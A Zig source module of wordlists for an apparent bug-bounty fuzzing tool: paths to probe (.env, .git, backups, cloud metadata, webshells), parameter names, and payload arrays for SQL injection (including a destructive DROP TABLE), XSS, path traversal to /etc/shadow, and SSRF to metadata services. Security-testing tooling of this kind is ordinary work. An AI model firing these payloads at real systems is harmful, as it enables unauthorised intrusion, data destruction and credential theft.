//! Wordlist Module
//! 
//! Built-in wordlists for path discovery and parameter fuzzing.
//! Optimized for bug bounty hunting.

pub const common_paths = [_][]const u8{
    // Admin panels
    "/admin",
    "/admin/login",
    "/admin.php",
    "/administrator",
    "/admincp",
    "/admin-console",
    "/backend",
    "/control",
    "/manager",
    "/phpmyadmin",
    "/pma",
    "/mysql",
    "/myadmin",
    
    // API endpoints
    "/api",
    "/api/v1",
    "/api/v2",
    "/api/docs",
    "/api/swagger",
    "/api/openapi",
    "/api/health",
    "/api/status",
    "/api/users",
    "/api/config",
    "/graphql",
    
    // Authentication
    "/login",
    "/signin",
    "/sign-in",
    "/signup",
    "/register",
    "/logout",
    "/signout",
    "/auth",
    "/authenticate",
    "/oauth",
    "/oauth2",
    "/token",
    "/refresh",
    "/reset",
    "/forgot",
    "/forgot-password",
    "/reset-password",
    "/change-password",
    "/verify",
    "/confirm",
    
    // User data
    "/user",
    "/users",
    "/profile",
    "/account",
    "/settings",
    "/preferences",
    "/me",
    "/dashboard",
    "/home",
    
    // Files and uploads
    "/upload",
    "/uploads",
    "/files",
    "/download",
    "/downloads",
    "/static",
    "/assets",
    "/images",
    "/img",
    "/css",
    "/js",
    "/javascript",
    "/scripts",
    "/media",
    "/documents",
    "/docs",
    "/attachments",
    
    // Configuration
    "/config",
    "/configuration",
    "/settings.php",
    "/config.php",
    "/config.json",
    "/config.yml",
    "/config.yaml",
    "/.env",
    "/.env.local",
    "/.env.production",
    "/.env.development",
    "/.git/config",
    "/.git/HEAD",
    "/.gitignore",
    "/.htaccess",
    "/.htpasswd",
    "/web.config",
    "/robots.txt",
    "/sitemap.xml",
    "/crossdomain.xml",
    "/clientaccesspolicy.xml",
    
    // Backup files
    "/backup",
    "/backups",
    "/old",
    "/backup.sql",
    "/backup.zip",
    "/backup.tar.gz",
    "/database.sql",
    "/db.sql",
    "/dump.sql",
    "/dump",
    "/archive",
    
    // Sensitive files
    "/server-status",
    "/server-info",
    "/.svn",
    "/.svn/entries",
    "/CVS",
    "/CVS/Root",
    "/.DS_Store",
    "/Thumbs.db",
    "/error_log",
    "/error.log",
    "/access.log",
    "/debug.log",
    "/php_error.log",
    
    // Common frameworks
    "/wp-admin",
    "/wp-login.php",
    "/wp-content",
    "/wp-includes",
    "/wp-config.php",
    "/xmlrpc.php",
    "/wp-json",
    "/wp-cron.php",
    
    // Magento
    "/admin_1q2w3e",
    "/index.php/admin",
    "/magento/admin",
    
    // Drupal
    "/user/login",
    "/admin/config",
    "/node",
    "/drupal",
    
    // Joomla
    "/administrator",
    "/joomla",
    
    // Django
    "/admin/",
    "/django-admin",
    
    // Rails
    "/rails/info/properties",
    
    // Spring
    "/actuator",
    "/actuator/health",
    "/actuator/env",
    "/actuator/configprops",
    "/actuator/mappings",
    "/actuator/heapdump",
    
    // Debug endpoints
    "/debug",
    "/debug/pprof",
    "/trace",
    "/metrics",
    "/health",
    "/healthz",
    "/healthcheck",
    "/ping",
    "/pong",
    "/status",
    "/monitor",
    
    // Development
    "/test",
    "/testing",
    "/dev",
    "/staging",
    "/beta",
    "/demo",
    "/sandbox",
    "/poc",
    "/prototype",
    
    // Cloud metadata
    "/latest/meta-data/",
    "/latest/user-data",
    "/metadata/v1/",
    "/metadata/instance",
    "/computeMetadata/v1/",
    
    // Other
    "/search",
    "/report",
    "/export",
    "/import",
    "/cron",
    "/cron.php",
    "/shell",
    "/cmd",
    "/exec",
    "/run",
    "/system",
    "/console",
    "/terminal",
    "/webshell",
    "/c99",
    "/r57",
};

pub const common_params = [_][]const u8{
    // ID parameters
    "id",
    "user_id",
    "uid",
    "uid1",
    "uid2",
    "account_id",
    "customer_id",
    "order_id",
    "transaction_id",
    "session_id",
    "sid",
    "token",
    "access_token",
    "auth_token",
    "api_key",
    "apikey",
    "key",
    "secret",
    "password",
    "pass",
    "pwd",
    "passwd",
    
    // File parameters
    "file",
    "path",
    "folder",
    "dir",
    "document",
    "page",
    "template",
    "theme",
    "lang",
    "language",
    "locale",
    "location",
    "url",
    "uri",
    "link",
    "href",
    "redirect",
    "return",
    "returnTo",
    "return_to",
    "next",
    "nextUrl",
    "next_url",
    "callback",
    "continue",
    "dest",
    "destination",
    "go",
    "goto",
    "target",
    
    // Query parameters
    "query",
    "q",
    "search",
    "find",
    "filter",
    "where",
    "from",
    "to",
    "start",
    "end",
    "begin",
    "finish",
    "min",
    "max",
    "limit",
    "offset",
    "page",
    "size",
    "count",
    "num",
    "number",
    "index",
    "sort",
    "order",
    "by",
    "group",
    "groupby",
    
    // Input parameters
    "input",
    "data",
    "value",
    "val",
    "name",
    "title",
    "description",
    "content",
    "body",
    "text",
    "message",
    "msg",
    "comment",
    "note",
    "info",
    "details",
    "extra",
    
    // User info
    "username",
    "user",
    "login",
    "email",
    "mail",
    "address",
    "phone",
    "mobile",
    "tel",
    "firstname",
    "lastname",
    "fullname",
    "name",
    "nickname",
    "nick",
    "displayname",
    
    // Dates
    "date",
    "time",
    "datetime",
    "timestamp",
    "created",
    "updated",
    "modified",
    "expires",
    "expiry",
    
    // Actions
    "action",
    "do",
    "task",
    "job",
    "operation",
    "op",
    "func",
    "function",
    "method",
    "type",
    "format",
    "view",
    "display",
    "show",
    "hide",
    "enable",
    "disable",
    "active",
    "status",
    "state",
    
    // Injection-prone parameters
    "cmd",
    "command",
    "exec",
    "execute",
    "shell",
    "bash",
    "script",
    "code",
    "eval",
    "include",
    "require",
    "load",
    "import",
    "xml",
    "json",
    "yaml",
    "csv",
    "html",
    "php",
    "asp",
    "jsp",
    "sql",
    
    // Misc
    "debug",
    "test",
    "dev",
    "admin",
    "root",
    "super",
    "master",
    "owner",
    "role",
    "perm",
    "permission",
    "access",
    "privilege",
    "level",
    "scope",
    "domain",
    "host",
    "port",
    "server",
    "site",
    "app",
    "application",
    "service",
    "api",
    "version",
    "v",
    "ver",
    "rev",
    "revision",
    "build",
    "release",
    "branch",
    "tag",
    "commit",
    "ref",
    "reference",
};

/// Fuzzing payloads for different vulnerability types
pub const sqli_payloads = [_][]const u8{
    "'",
    "\"",
    "' OR '1'='1",
    "\" OR \"\"=\"",
    "' OR 1=1--",
    "\" OR 1=1--",
    "' OR '1'='1'--",
    "\" OR \"1\"=\"1",
    "' OR ''='",
    "1' AND '1'='1",
    "1' AND '1'='2",
    "' UNION SELECT NULL--",
    "' UNION SELECT NULL, NULL--",
    "'; DROP TABLE users--",
    "'; WAITFOR DELAY '0:0:10'--",
    "1; SELECT SLEEP(10)",
    "1' AND SLEEP(5)",
    "admin'--",
    "1' ORDER BY 1--",
    "1' ORDER BY 10--",
    "' AND 1=1--",
    "' AND 1=2--",
    "-1' UNION SELECT 1,2,3--",
};

pub const xss_payloads = [_][]const u8{
    "<script>alert(1)</script>",
    "<script>alert(document.cookie)</script>",
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
    "<body onload=alert(1)>",
    "<iframe src=\"javascript:alert(1)\">",
    "<input onfocus=alert(1) autofocus>",
    "<marquee onstart=alert(1)>",
    "<details open ontoggle=alert(1)>",
    "javascript:alert(1)",
    "data:text/html,<script>alert(1)</script>",
    "\"><script>alert(1)</script>",
    "'-alert(1)-'",
    "\"><img src=x onerror=alert(1)>",
    "<SCRIPT>alert(1)</SCRIPT>",
    "<ScRiPt>alert(1)</ScRiPt>",
    "<img/src=x onerror=alert(1)>",
    "<svg/onload=alert(1)>",
    "<body/onload=alert(1)>",
    "<<script>alert(1)//<</script>",
};

pub const traversal_payloads = [_][]const u8{
    "../",
    "..\\",
    "..%2f",
    "..%5c",
    "%2e%2e%2f",
    "%2e%2e/",
    "..%252f",
    "..%c0%af",
    "..%c1%9c",
    "....//",
    "....\\\\",
    "/..",
    "\\..",
    "/etc/passwd",
    "/etc/shadow",
    "/etc/hosts",
    "/etc/inetd.conf",
    "/etc/group",
    "/proc/self/environ",
    "/proc/self/cmdline",
    "/proc/self/status",
    "/var/log/apache2/access.log",
    "/var/log/httpd/access_log",
    "C:\\Windows\\System32\\drivers\\etc\\hosts",
    "C:\\inetpub\\logs\\LogFiles",
    "file:///etc/passwd",
    "file:///c:/windows/win.ini",
};

pub const ssrf_payloads = [_][]const u8{
    "http://127.0.0.1",
    "http://localhost",
    "http://[::1]",
    "http://0.0.0.0",
    "http://169.254.169.254",
    "http://metadata.google.internal",
    "http://metadata.google.internal/computeMetadata/v1/",
    "http://169.254.169.254/latest/meta-data/",
    "http://169.254.169.254/latest/user-data/",
    "http://169.254.169.254/metadata/v1/",
    "http://169.254.169.254/metadata/instance",
    "http://100.100.100.200/latest/meta-data/",
    "file:///etc/passwd",
    "file:///c:/windows/win.ini",
    "dict://127.0.0.1:6379",
    "gopher://127.0.0.1:6379",
    "sftp://127.0.0.1:22",
    "ldap://127.0.0.1",
    "tftp://127.0.0.1",
    "http://localtest.me",
    "http://customer1.app.localhost.my.company.127.0.0.1.nip.io",
};
